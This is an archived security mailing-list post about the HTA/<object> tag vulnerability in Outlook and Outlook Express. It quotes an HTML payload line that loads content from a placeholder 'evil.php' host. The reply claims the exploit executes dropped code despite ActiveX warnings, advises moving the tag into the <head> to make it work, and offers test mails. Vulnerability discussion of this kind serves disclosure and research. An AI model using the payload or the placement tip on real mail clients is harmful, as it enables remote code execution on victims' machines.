[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <Law11-OE69N2LIS1rbY0000ab89@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: HTA/<object> vulnerability
> Has anyone has been able to confirm that the HTA/<object> tag vulnerability
> is exploitable in Outlook and Outlook express? The EEYE advisory states
> that its possible but I haven't seen it work. The following does not
> work.
>
> <div style.none><object data="http://server/evil.php"></object></div>
in my observance, at least OE, even if you get an ActiveX warning,
the exploit still runs and executes the dropped code.
try placing the tag in the <head> tag </head>.
morning_wood
note: if anyone wishes a test mail, let me know
Powered by blists - more mailing lists